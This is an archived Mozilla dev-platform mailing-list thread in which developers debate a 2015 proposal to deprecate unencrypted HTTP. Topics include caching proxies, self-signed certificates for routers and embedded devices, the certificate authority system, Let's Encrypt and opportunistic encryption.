> (And anecdotally, I find it easier to convince developers to deploy
> HTTPS on the basis of some feature needing it than on merit. And it
> makes sense, if they need their service to do X, they'll go through
> the extra trouble to do Y to get to X.)

Don't convince the developers. Convince the business. Drive users away to secure services by displaying warnings, etc.

Anecdotally on my end, I saw small Web sites that care very little about security move to HTTPS overnight after Google added HTTPS as a (weak) ranking signal <http://googlewebmastercentral.blogspot.fr/2014/08/https-as-ranking-signal.html>. (Reason #4 in that NYT article.)
On Tue, Apr 14, 2015 at 9:51 AM, <lorenzo.keller@gmail.com> wrote:
> 1) Caching proxies: resources obtained over HTTPS cannot be cached by a
> proxy that doesn't use MITM certificates. If all users must move to HTTPS
> there will be no way to re-use content downloaded for one user to
> accelerate another user. This is an important issue for locations with
> many users and poor internet connectivity.

Where is the evidence that this is a problem in practice? What do these environments do for YouTube?

> 2) Self-signed certificates: in many situations it is hard/impossible to
> get certificates signed by a CA (e.g. provisioning embedded devices). The
> current approach in many of these situations is not to use HTTPS. If the
> plan goes into effect, what other solution could be used?

Either something like https://bugzilla.mozilla.org/show_bug.cgi?id=1012879 as you mentioned or overrides for local devices. This definitely needs more research but shouldn't preclude rolling out HTTPS on public resources.

--
https://annevankesteren.nl/
On Tue, Apr 14, 2015 at 9:55 AM, Yoav Weiss <yoav@yoav.ws> wrote:
> You're inflicting developer pain without any real justification. A sort of
> collective punishment, if you will.

Why is it that you think there is no justification in deprecating HTTP?

> Don't convince the developers. Convince the business.

Why not both? There's no reason to only attack this top-down.

--
https://annevankesteren.nl/
On Tue, Apr 14, 2015 at 10:07 AM, Anne van Kesteren <annevk@annevk.nl> wrote:
> Why is it that you think there is no justification in deprecating HTTP?

Deprecating HTTP is totally justified. Enabling some features on HTTP but not others is not, unless there's a real technical reason why these new features shouldn't be enabled.
On Tue, Apr 14, 2015 at 10:39 AM, Yoav Weiss <yoav@yoav.ws> wrote:
> Deprecating HTTP is totally justified. Enabling some features on HTTP but
> not others is not, unless there's a real technical reason why these new
> features shouldn't be enabled.

I don't follow. If HTTP is no longer a first-class citizen, why do we need to treat it as such?

--
https://annevankesteren.nl/
On Tuesday, April 14, 2015 at 8:44:25 PM UTC+12, Anne van Kesteren wrote:
> I don't follow. If HTTP is no longer a first-class citizen, why do we
> need to treat it as such?

When it takes *more* effort to disable certain features on HTTP than to let them work.
On Tuesday, April 14, 2015 at 8:44:25 PM UTC+12, Anne van Kesteren wrote:
> I don't follow. If HTTP is no longer a first-class citizen, why do we
> need to treat it as such?

When it would take more effort to disable a feature on HTTP than to let it work, and yet the feature is disabled anyway, that's more than just HTTP being "not a first-class citizen".
On Tue, Apr 14, 2015 at 10:43 AM, Anne van Kesteren <annevk@annevk.nl> wrote:
> On Tue, Apr 14, 2015 at 10:39 AM, Yoav Weiss <yoav@yoav.ws> wrote:
> > Deprecating HTTP is totally justified. Enabling some features on HTTP but
> > not others is not, unless there's a real technical reason why these new
> > features shouldn't be enabled.
>
> I don't follow. If HTTP is no longer a first-class citizen, why do we
> need to treat it as such?

I'm afraid the second-class citizens in that scenario would be the new features, rather than HTTP.
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote:
> There's pretty broad agreement that HTTPS is the way forward for the web.
> In recent months, there have been statements from IETF [1], IAB [2], W3C
> [3], and even the US Government [4] calling for universal use of
> encryption, which in the case of the web means HTTPS.

Each organisation has its own reasons to move away from HTTP. It doesn't mean that each of those reasons is ethical.

> In order to encourage web developers to move from HTTP to HTTPS

Why? Large multinationals do not allow HTTPS traffic within the border gateways of their own infrastructure; why make it harder for them?

Why give people the impression in the future that because they are using HTTPS they are much safer, when the implications are much larger? (No dependability anymore, forced to trust root CAs, etc.)

Why force hosting companies and webmasters to bear extra costs? Do not forget that most used webmaster/webhoster control panels do not support SNI, and that each HTTPS site then has to have its own unique IP address. Here in Europe we are still using IPv4, and RIPE can't issue new IPv4 addresses because they are all gone. So as long as that isn't resolved, it can't be done.

IMHO HTTPS would be safer if no large companies or governments were involved with issuing the certificates, and the certificates were free or somehow otherwise compensated.

The countries where people profit less from HTTPS because human rights are more respected have the means to pay for SSL certificates, but the people who you want to protect don't, and even if they did, they always have a government(s) to deal with.

As long as you think that root CAs are 100% trustworthy and governments can't manipulate or do a replay attack afterwards, HTTPS is the way to go... until that (and the SNI/IPv4) issue is handled, don't, because it will cause more harm in the long run.

Do not get me wrong, the intention is good. But trying to protect humanity from humanity also means keeping in mind the issues surrounding it.
> On 14 Apr 2015, at 11:42, intellectueel@gmail.com wrote:

Something entirely off-topic: I'd like to inform people that your replies to popular threads like this, unsigned, with only a notion of identity in an obscure email address, make me - and I'm sure others too - skip your message or worse: not take it seriously. In my mind I fantasize your message signed off with something like:

"Cheers, mYLitTL3P0nIEZLuLZrAinBowZ.
- Sent from a Galaxy Tab Nexuzzz Swift Super, Gold & Ruby Edition by an 8yr old stuck in Kindergarten."

... which doesn't feel like the identity anyone would prefer to assume.

Best,
Mike.
On 4/14/15 3:28 AM, Anne van Kesteren wrote:
> On Tue, Apr 14, 2015 at 4:10 AM, Karl Dubost <kdubost@mozilla.com> wrote:
>> 1. You do not need to register a domain name to have a Web site (IP address)
>
> Name one site you visit regularly that doesn't have a domain name.

My router's configuration UI. Here "regularly" is probably once a month or so.

> And even then, you can get certificates for public IP addresses.

It's not a public IP address.

We do need a solution for this space, which I expect includes the various embedded devices people are bringing up; I expect those are behind firewalls more often than on the publicly routable internet.

-Boris
> Something entirely off-topic: I'd like to inform people that your replies
> to popular threads like this, unsigned, with only a notion of identity in
> an obscure email address, make me - and I'm sure others too - skip your
> message or worse: not take it seriously.

Not everyone has the luxury of being public on the Internet. Especially in discussions about default Internet encryption. The real decision makers won't be posting at all.
Joshua Cranmer 🐧 wrote:
> If you actually go to read the details of the proposal rather than
> relying only on the headline, you'd find that there is an intent to
> actually let you continue to use http for, e.g., localhost. The exact
> boundary between "secure" HTTP and "insecure" HTTP is being actively
> discussed in other forums.

My main concern with the notion of phasing out unsecured HTTP is that doing so will cripple or eliminate Internet access by older devices that aren't generally capable of handling encryption and decryption on such a massive scale in real time.

While it may sound silly, those of us who are into classic computers and making them do fun new things use HTTP to connect 10 MHz (or even 1 MHz) machines to the Internet. These machines can't handle the demands of SSL. So this is a step toward making their Internet connections go away.

This may not be enough of a reason to save HTTP, but it's something I wanted to point out.

--
Eric Shepherd
Senior Technical Writer
Mozilla <https://www.mozilla.org/>
Blog: http://www.bitstampede.com/
Twitter: http://twitter.com/sheppy
On Tuesday, April 14, 2015 at 3:05:09 AM UTC-5, Anne van Kesteren wrote:
> This definitely needs more research
> but shouldn't preclude rolling out HTTPS on public resources.

The proposal as presented is not limited to public resources. The W3C Privileged Context draft which it references exempts only localhost and file:/// resources, not resources on private networks. There are hundreds of millions of home routers and similar devices with web UIs on private networks, and no clear path under this proposal to keep them fully accessible (without arbitrary feature limitations) except to set up your own local CA, which is excessively burdensome.

Eli Naeher
On 14/04/15 01:57, northrupthebandgeek@gmail.com wrote:
> * Less scary warnings about self-signed certificates (i.e. treat
> HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do
> with HTTPS+selfsigned now); the fact that self-signed HTTPS is
> treated as less secure than HTTP is - to put this as politely and
> gently as possible - a pile of bovine manure

http://gerv.net/security/self-signed-certs/ , section 3.

But also, Firefox is implementing opportunistic encryption, which AIUI gives you a lot of what you want here.

Gerv
On 14/04/15 08:51, lorenzo.keller@gmail.com wrote:
> 1) Caching proxies: resources obtained over HTTPS cannot be cached by
> a proxy that doesn't use MITM certificates. If all users must move to
> HTTPS there will be no way to re-use content downloaded for one user
> to accelerate another user. This is an important issue for locations
> with many users and poor internet connectivity.

Richard talked, IIRC, about not allowing subloads over HTTP with subresource integrity. This is one argument to the contrary. Sites could use HTTP-with-integrity to provide an experience which allowed for better caching, with the downside being some loss of coarse privacy for the user. (Cached resources, by their nature, are not going to be user-specific, so there won't be a leak of PII. But it might leak what you are reading or what site you are on.)

Gerv
I'm curious as to what would happen with things that cannot have TLS certificates: routers and similar web-configurable-only devices (like small PBX-like devices, etc). They don't have a proper domain, and may grab an IP via radvd (or dhcp on IPv4), so there's no certificate to be had. They'd have to use self-signed, which seems to be treated pretty badly (warning message, etc). Would we be getting rid of the self-signed warning when visiting a website?
On Mon, Apr 13, 2015 at 5:11 PM, <bryan.beicker@gmail.com> wrote:
> One limiting factor is that Firefox doesn't treat form data the same on
> HTTPS sites.
>
> Examples:
>
> http://stackoverflow.com/questions/14420624/how-to-keep-changed-form-content-when-leaving-and-going-back-to-https-page-wor
>
> http://stackoverflow.com/questions/10511581/why-are-html-forms-sometimes-cleared-when-clicking-on-the-browser-back-button
>
> After losing a few forum posts or wiki edits to this bug in Firefox, you
> quickly insist on using unsecured HTTP as often as possible.

Interesting observation. ISTM that that's a bug in HTTPS. At least I don't see an obvious security reason for the behavior to be that way.

More generally: I expect that this process will turn up bugs in HTTPS behavior, either "actual" bugs in terms of implementation errors, or "logical" bugs where the intended behavior does not meet the expectations or needs of websites. So we should be open to adapting our HTTPS behavior some (within the bounds of the security requirements) in order to facilitate this transition.

--Richard
On Mon, Apr 13, 2015 at 7:03 PM, Martin Thomson <mt@mozilla.com> wrote: > On Mon, Apr 13, 2015 at 3:53 PM, Eugene <imfasterthanneutrino@gmail.com> > wrote: > > In addition to APIs, I'd like to propose prohibiting caching any > resources loaded over insecure HTTP, regardless of Cache-Control header, in > Phase 2.N. > > This has some negative consequences (if only for performance). I'd > like to see changes like this properly coordinated. I'd rather just > treat "caching" as one of the features for Phase 2.N. > That seems sensible. I was about to propose a lifetime limit on caching (say a few hours?) to limit the persistence scope of a MitM, i.e., require periodic re-infection. There may be ways to circumvent this (e.g., the MitM's code sending cache priming requests), but it seems incrementally better. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
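A sketch of what such a clamp might look like inside a cache, assuming the Cache-Control headers have already been parsed; the constant, the value, and the function name are hypothetical, not anything Gecko implements:

```python
INSECURE_MAX_LIFETIME = 4 * 3600  # "a few hours"; hypothetical value

def effective_freshness(scheme: str, declared_max_age: int) -> int:
    """Clamp the freshness lifetime of http:// responses so that a
    resource injected by a MitM cannot live in the cache indefinitely;
    the attacker would have to be on-path again to re-infect it."""
    if scheme == "http":
        return min(declared_max_age, INSECURE_MAX_LIFETIME)
    return declared_max_age  # https:// keeps its declared lifetime

# A year-long max-age on plain HTTP gets cut down to a few hours:
assert effective_freshness("http", 365 * 24 * 3600) == INSECURE_MAX_LIFETIME
```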
On Mon, Apr 13, 2015 at 9:43 PM, <imfasterthanneutrino@gmail.com> wrote: > On Monday, April 13, 2015 at 8:57:41 PM UTC-4, northrupt...@gmail.com > wrote: > > > > * Less scary warnings about self-signed certificates (i.e. treat > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with > HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less > secure than HTTP is - to put this as politely and gently as possible - a > pile of bovine manure > > This feature (i.e. opportunistic encryption) was implemented in Firefox > 37, but unfortunately an implementation bug made HTTPS insecure too. But I > guess Mozilla will fix it and make this feature available in a future > release. > > > * Support for a decentralized (blockchain-based, ala Namecoin?) > certificate authority > > > > Basically, the current CA system is - again, to put this as gently and > politely as possible - fucking broken. Anything that forces the world to > rely on it exclusively is not a solution, but is instead just going to make > the problem worse. > > I don't think the current CA system is broken. The domain name > registration is also centralized, but almost every website has a hostname, > rather than using IP address, and few people complain about this. > I would also note that Mozilla is contributing heavily to Let's Encrypt, which is about as close to a decentralized CA as we can get with current technology. If people have ideas for decentralized CAs, I would be interested in listening, and possibly adding support in the long run. But unfortunately, the state of the art isn't quite there yet. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
On Mon, Apr 13, 2015 at 11:26 PM, <ipartola@gmail.com> wrote: > > * Less scary warnings about self-signed certificates (i.e. treat > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with > HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less > secure than HTTP is - to put this as politely and gently as possible - a > pile of bovine manure > > I am against this. Both are insecure and should be treated as such. How is > your browser supposed to know that gmail.com is intended to serve a > self-signed cert? It's not, and it cannot possibly know it in the general > case. Thus it must be treated as insecure. > This is a good point. This is exactly why the opportunistic security feature in Firefox 37 enables encryption without certificate checks for *http* resources. --Richard > > * Support for a decentralized (blockchain-based, ala Namecoin?) > certificate authority > > No. Namecoin has so many other problems that it is not feasible. > > > Basically, the current CA system is - again, to put this as gently and > politely as possible - fucking broken. Anything that forces the world to > rely on it exclusively is not a solution, but is instead just going to make > the problem worse. > > Agree that it's broken. The fact that any CA can issue a cert for any > domain is stupid, always was and always will be. It's now starting to bite > us. > > However, HTTPS and the CA system don't have to be tied together. Let's > ditch the immediately insecure plain HTTP, then add ways to authenticate > trusted certs in HTTPS by means other than our current CA system. The two > problems are orthogonal, and trying to solve both at once will just leave > us exactly where we are: trying to argue for a fundamentally different > system. > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
On Mon, Apr 13, 2015 at 10:10 PM, Karl Dubost <kdubost@mozilla.com> wrote: > > On 14 Apr. 2015 at 10:43, imfasterthanneutrino@gmail.com wrote: > > I don't think the current CA system is broken. > > The current CA system creates issues for certain categories of population. > It is broken in some ways. > > > The domain name registration is also centralized, but almost every > website has a hostname, rather than using IP address, and few people > complain about this. > > Two points: > > 1. You do not need to register a domain name to have a Web site (IP > address) > 2. You do not need to register a domain name to run a local blah.test.site > > Both are still working and not deprecated in browsers ^_^ > > Now, the fact that you have to rent your domain name ($$$), and that all your URIs are tied to it, has strong social consequences for permanent identifiers and the fabric of time on information. But that's another debate than the one of this thread on deprecating HTTP in favor of HTTPS. > This is a fair point, and we should probably figure out a way to accommodate these. My inclination is to mostly punt this to manual configuration (e.g., installing a new trusted cert/override), since we're not talking about generally available public services on the Internet. But if there are more elegant solutions that don't reduce security, I would be interested to hear them. > I would love to see this discussion happening in Whistler too. > Agreed. That sounds like an excellent opportunity to hammer out details here, assuming we can agree on overall direction in the meantime. --Richard > > -- > Karl Dubost, Mozilla > http://www.la-grange.net/karl/moz > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
On Tue, Apr 14, 2015 at 3:55 AM, Yoav Weiss <yoav@yoav.ws> wrote: > On Tue, Apr 14, 2015 at 8:22 AM, Anne van Kesteren <annevk@annevk.nl> > wrote: > > On Tue, Apr 14, 2015 at 7:52 AM, Yoav Weiss <yoav@yoav.ws> wrote: > > > Limiting new features does absolutely nothing in that aspect. > > > > Hyperbole much? The CTO of the New York Times cited HTTP/2 and Service > > Workers as a reason to start deploying HTTPS: > > > > http://open.blogs.nytimes.com/2014/11/13/embracing-https/ > > I stand corrected. So it's the 8th reason out of 9, right before technical > debt. > > I'm not saying using new features is not an incentive, and I'm definitely > not saying HTTP2 and SW should have been enabled on HTTP. > But, when done without any real security or deployment issues that mandate > it, you're subjecting new features to significant adoption friction that is > unrelated to the feature itself, in order to apply some indirect pressure > on businesses to do the right thing. > Please note that there is no inherent security reason to limit HTTP/2 to be used only over TLS (as there is for SW), at least not any more than the security reasons for carrying HTTP/1.1 over TLS. They're semantically equivalent; HTTP/2 is just faster. So if you're OK with limiting HTTP/2 to TLS, you've sort of already bought into the strategy we're proposing here. > You're inflicting developer pain without any real justification. A sort of > collective punishment, if you will. > > If you want to apply pressure, apply it where it makes the most impact with > the least cost. Limiting new features to HTTPS is not the place, IMO. > I would note that these options are not mutually exclusive :) We can apply pressure with feature availability at the same time that we work on the ecosystem problems. In fact, I had a call with some advertising folks last week about how to get the ad industry upgraded to HTTPS. --Richard > > (And anecdotally, I find it easier to convince developers to deploy > HTTPS on the basis of some feature needing it than on merit. And it > makes sense, if they need their service to do X, they'll go through > the extra trouble to do Y to get to X.) > > Don't convince the developers. Convince the business. Drive users away to > secure services by displaying warnings, etc. > Anecdotally on my end, I saw small Web sites that care very little about > security move to HTTPS overnight after Google added HTTPS as a (weak) > ranking signal > <http://googlewebmastercentral.blogspot.fr/2014/08/https-as-ranking-signal.html>. > (reason #4 in that NYT article) > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
On Tue, Apr 14, 2015 at 8:32 AM, Eric Shepherd <eshepherd@mozilla.com> wrote: > Joshua Cranmer 🐧 wrote: > >> If you actually go to read the details of the proposal rather than >> relying only on the headline, you'd find that there is an intent to >> actually let you continue to use http for, e.g., localhost. The exact >> boundary between "secure" HTTP and "insecure" HTTP is being actively >> discussed in other forums. >> > My main concern with the notion of phasing out unsecured HTTP is that > doing so will cripple or eliminate Internet access by older devices that > aren't generally capable of handling encryption and decryption on such a > massive scale in real time. > > While it may sound silly, those of us who are into classic computers and > making them do fun new things use HTTP to connect 10 MHz (or even 1 MHz) > machines to the Internet. These machines can't handle the demands of SSL. > So this is a step toward making their Internet connections go away. > > This may not be enough of a reason to save HTTP, but it's something I > wanted to point out. As the owner of a Mac SE/30 with a 100MB Ethernet card, I sympathize. However, consider it part of the challenge! :) There are definitely TLS stacks that work on some pretty small devices. --Richard > > > -- > > Eric Shepherd > Senior Technical Writer > Mozilla <https://www.mozilla.org/> > Blog: http://www.bitstampede.com/ > Twitter: http://twitter.com/sheppy > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
On Tue, Apr 14, 2015 at 9:57 AM, <hugoosvaldobarrera@gmail.com> wrote: > I'm curious as to what would happen with things that cannot have TLS > certificates: routers and similar web-configurable-only devices (like small > PBX-like devices, etc). > > They don't have a proper domain, and may grab an IP via radvd (or dhcp on > IPv4), so there's no certificate to be had. > > They'd have to use self-signed, which seems to be treated pretty badly > (warning message, etc). > > Would we be getting rid of the self-signed warning when visiting a website? > Well, no. :) Note that the primary difference between opportunistic security (which is HTTP) and HTTPS is authentication. We should think about what sorts of expectations people have for these devices, and to what degree those expectations can be met. Since you bring up IPv6, there might be some possibility that devices could authenticate their IP addresses automatically, using cryptographically generated addresses and self-signed certificates using the same public key. http://en.wikipedia.org/wiki/Cryptographically_Generated_Address --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
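Roughly, a CGA binds a host's public key into its IPv6 interface identifier, so proving possession of the key proves ownership of the address, with no CA involved. A deliberately simplified sketch of the RFC 3972 derivation (the real algorithm also hashes the subnet prefix and a collision count, and runs a hash-extension step for higher sec values):

```python
import hashlib

def cga_interface_id(public_key_der: bytes, modifier: bytes, sec: int = 0) -> bytes:
    """Derive a 64-bit IPv6 interface identifier from a public key.

    A peer that later receives the key can recompute this hash and
    check it against the address it is talking to: the address itself
    attests to key ownership.
    """
    h = hashlib.sha1(modifier + public_key_der).digest()
    iid = bytearray(h[:8])
    # The top three bits carry the 'sec' parameter; the u and g bits
    # of a modified EUI-64 identifier (0x02 and 0x01 of byte 0) are
    # cleared, per the RFC.
    iid[0] = ((sec & 0x7) << 5) | (iid[0] & 0x1C)
    return bytes(iid)
```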
Dynamic DNS might be difficult to run on HTTPS as the IP address needs to change when say your cable modem IP updates. HTTPS only would make running personal sites more difficult for individuals, and would make the internet slightly less democratic. On Monday, April 13, 2015 at 7:57:58 AM UTC-7, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > > <snip>
On 4/14/15 10:53, justin.kruger@gmail.com wrote: > Dynamic DNS might be difficult to run on HTTPS as the IP address needs to change when say your cable modem IP updates. HTTPS only would make running personal sites more difficult for individuals, and would make the internet slightly less democratic. I'm not sure I follow. I have a cert for a web site running on a dynamic address using DynDNS, and it works just fine. Certs are bound to names, not addresses. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
On 4/14/15 11:53 AM, justin.kruger@gmail.com wrote: > Dynamic DNS might be difficult to run on HTTPS as the IP address needs to change when say your cable modem IP updates. Justin, I'm not sure I follow the problem here. If I understand correctly, you're talking about a domain name, say "foo.bar", which is mapped to different IPs via dynamic DNS, and a website running on the machine behind the relevant cable modem, right? Is the site being accessed directly via the IP address or via the foo.bar hostname? Because if it's the latter, then a cert issued to foo.bar would work fine as the IP changes; certificates are bound to a hostname string (which can happen to have the form "123.123.123.123", of course), not an IP address. And if the site is being accessed via (changeable) IP address, then how is dynamic DNS relevant? I would really appreciate an explanation of what problem you're seeing here that I'm missing. -Boris
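The point that certificates bind to names rather than addresses is easy to demonstrate: standard TLS clients verify the peer certificate against the hostname string you dialed, and the IP the name currently resolves to never enters into the check. A small sketch with Python's ssl module (the dynamic-DNS hostname is made up):

```python
import socket
import ssl

hostname = "example.dyndns.org"  # hypothetical dynamic-DNS name

# create_default_context() verifies the chain *and* matches the
# certificate's subjectAltName entries against `hostname`; whatever
# IP the name happens to resolve to today is irrelevant to the check.
ctx = ssl.create_default_context()
with socket.create_connection((hostname, 443)) as raw:
    with ctx.wrap_socket(raw, server_hostname=hostname) as tls:
        print(tls.getpeercert()["subjectAltName"])
        # e.g. (('DNS', 'example.dyndns.org'),)
```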
Hi Mozilla friends. Glad to see this proposal! As Richard mentions, we over on Chromium are working on a similar plan, albeit limited to "powerful features." I just wanted to mention that regarding subresource integrity (https://w3c.github.io/webappsec/specs/subresourceintegrity/), the general consensus over here is that we will not treat origins as secure if they are over HTTP but loaded with integrity. We believe that security includes confidentiality, which that approach would lack. --Joel
> We believe that security includes confidentiality, which that approach would lack. Hey Joel, SSL already leaks which domain name you are visiting anyway, so the most confidentiality this can bring you is hiding the specific URL involved in a cache miss. That's a fairly narrow upgrade to confidentiality. A scenario where it would matter: a MITM wishes to block viewing of a specific video on a video hosting site, but is unwilling to block the whole site. In such cases you would indeed want full SSL, assuming the host can afford it. A scenario where it would not matter: some country wishes to fire a Great Cannon. There integrity is enough. I think the case for requiring integrity for all connections is strong: malware injection is simply not on. The case for confidentiality of user data and cookies is equally clear. The case for confidentiality of cache misses of static assets is a bit less clear: sites that host a lot of very different content like YouTube might care, and a site where all the content is the same (e.g. a porn site) might feel the difference between a URL and a domain name is so tiny that it's irrelevant - they'd rather have the performance improvements from caching proxies. Sites that have a lot of users in developing countries might also feel differently to Google engineers with workstations hard-wired into the internet backbone ;) Anyway, just my 2c.
Richard Barnes wrote: > As the owner of a Mac SE/30 with a 100MB Ethernet card, I > sympathize. However, consider it part of the challenge! :) There > are definitely TLS stacks that work on some pretty small devices. That's a lot faster machine than the ones I play with. My fastest retro machine is an 8-bit unit with a 10 MHz processor and 4 MB of memory, with a 10 Mbps ethernet card. And the ethernet is underutilized because the bus speed of the computer is too slow to come anywhere close to saturating the bandwidth available. :) -- Eric Shepherd Senior Technical Writer Mozilla <https://www.mozilla.org/> Blog: http://www.bitstampede.com/ Twitter: http://twitter.com/sheppy
HTTPS has its moments, but the majority of the web does not need it. I certainly wouldn't appreciate the encryption overhead just for visiting David's lolcats website. As one of the most important organizations related to free software, it's sad to see Mozilla developers join the war on plaintext: http://arc.pasp.de/ The owners of websites like this have a right to serve their pages in formats that do not make hypocrites of themselves.
Hello, On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. > > <snip> > > Thanks, > --Richard While I fully understand what's at stake here and the reasoning behind this, I'd like to ask an admittedly troll-like question: will Mozilla start to offer certificates to every single domain name owner? Without that, your proposal tells me: either you pay for a certificate or you don't use the latest supported features on your personal (or professional) web site. This is a call for a revival of the "best viewed with XXX browser" banners. Making the warning page easier to bypass is a very, very bad idea. The warning page is here for a very good reason, and its primary function is to scare non-technically-literate people so that they don't put themselves in danger. Make it less scary and you'll get the infamous Windows Vista UAC dialog boxes where people click OK without even reading the content. The proposal fails to foresee another consequence of a full HTTPS web: the rise and fall of root CAs. If everyone needs to buy a certificate you can be sure that some companies will sell them for a low price, with limited background checks. These companies will be spotted - and their root CA will be revoked by browser vendors (this already happened in the past and I fail to see any reason why it would not happen again). Suddenly, a large portion of the web will be seen as even worse than "insecure HTTP" - it will be seen as "potentially dangerous HTTPS". The only way to avoid this situation is to put all the power in a very limited number of hands - then you'll witness a sharp rise in certificate prices. Finally, Mozilla's motto is to keep the web open. Requiring one to pay a fee - even if it's a small one - in order to allow him to have a presence on the Intarweb is not helping. Best regards, -- Emmanuel Deloget
On 4/14/15 15:35, emmanueldeloget53@gmail.com wrote: > Will Mozilla start to offer certificates to every single domain name owner ? Yes [1]. https://letsencrypt.org/ ____ [1] I'll note that Mozilla is only one of several organizations involved in making this effort happen. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
On Monday, April 13, 2015 at 8:26:59 PM UTC-7, ipar...@gmail.com wrote: > > * Less scary warnings about self-signed certificates (i.e. treat HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less secure than HTTP is - to put this as politely and gently as possible - a pile of bovine manure > > I am against this. Both are insecure and should be treated as such. How is your browser supposed to know that gmail.com is intended to serve a self-signed cert? It's not, and it cannot possibly know it in the general case. Thus it must be treated as insecure. Except that one is encrypted, and the other is not. *By logical measure*, the one that is encrypted but unauthenticated is more secure than the one that is neither encrypted nor authenticated, and the fact that virtually every HTTPS-supporting browser assumes the precise opposite is mind-boggling. I agree that authentication/verification is necessary for security, but to pretend that encryption is a non-factor when it's the only actual subject of this thread as presented by its creator is asinine. > > * Support for a decentralized (blockchain-based, ala Namecoin?) certificate authority > > No. Namecoin has so many other problems that it is not feasible. Like? And I'm pretty sure none of those problems (if they even exist) even remotely compare to the clusterfsck that is our current CA system. > > Basically, the current CA system is - again, to put this as gently and politely as possible - fucking broken. Anything that forces the world to rely on it exclusively is not a solution, but is instead just going to make the problem worse. > > Agree that it's broken. The fact that any CA can issue a cert for any domain is stupid, always was and always will be. It's now starting to bite us. > > However, HTTPS and the CA system don't have to be tied together. Let's ditch the immediately insecure plain HTTP, then add ways to authenticate trusted certs in HTTPS by means other than our current CA system. The two problems are orthogonal, and trying to solve both at once will just leave us exactly where we are: trying to argue for a fundamentally different system. Indeed they don't, but with the current ecosystem they are, which is my point; by deprecating HTTP *and* continuing to treat self-signed certs as literally worse than Hitler *and* relying on the current CA system exclusively for verification of certificates, we're doing nothing to actually solve anything. As orthogonal as those problems may seem, an HTTPS-only world will fail rather spectacularly without significant reform and refactoring on the CA side of things.
On 4/14/15 10:38 AM, Eric Shepherd wrote: > Richard Barnes wrote: >> As the owner of a Mac SE/30 with an 100MB Ethernet card, I >> sympathize. However, consider it part of the challenge! :) There >> are definitely TLS stacks that work on some pretty small devices. > That's a lot faster machine than the ones I play with. My fastest retro > machine is an 8-bit unit with a 10 MHz processor and 4 MB of memory, > with a 10 Mbps ethernet card. And the ethernet is underutilized because > the bus speed of the computer is too slow to come anywhere close to > saturating the bandwidth available. :) Candidly, and not because I still run such a site, I've always found Gopher to be a better fit for resource-constrained computing. The Commodore 128 sitting next to me does very well for that because the protocol and menu parsing conventions are incredibly trivial. What is your 10MHz 8-bit system? Cameron Kaiser gopher://gopher.floodgap.com/
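For anyone who hasn't seen it, the triviality claim is easy to back up: a Gopher transaction is one TCP connection, the selector string plus CRLF, then read to EOF, and menu lines are just tab-separated fields (RFC 1436). A minimal client sketch:

```python
import socket

def gopher_fetch(host: str, selector: str = "", port: int = 70) -> str:
    """Fetch one Gopher document or menu: send selector + CRLF, then
    read until the server closes the connection. That single round
    trip is the whole protocol."""
    with socket.create_connection((host, port)) as s:
        s.sendall(selector.encode("latin-1") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1", errors="replace")

# Menu lines carry a type character plus display string, then the
# selector, host, and port, separated by tabs; a lone "." ends the
# listing.
for line in gopher_fetch("gopher.floodgap.com").splitlines():
    if line == ".":
        break
    fields = line.split("\t")
    if len(fields) >= 4:
        print(fields[0][:1], fields[0][1:], "->", fields[1])
```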
On 4/14/15 16:32, northrupthebandgeek@gmail.com wrote: > *By logical measure*, the [connection] that is encrypted but unauthenticated is more secure than the one that is neither encrypted nor authenticated, and the fact that virtually every HTTPS-supporting browser assumes the precise opposite is mind-boggling. That depends on what kind of resource you're trying to access. If the resource you're trying to reach (in both circumstances) isn't demanding security -- i.e., it is an "http" URL -- then your logic is sound. That's the basis for enabling OE. The problem here is that you're comparing: * Unsecured connections working as designed with * Supposedly secured connections that have a detected security flaw An "https" URL is a promise of encryption _and_ authentication; and when those promises are violated, it's a sign that something has gone wrong in a way that likely has stark security implications. Resources loaded via an "http" URL make no such promises, so the situation isn't even remotely comparable. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
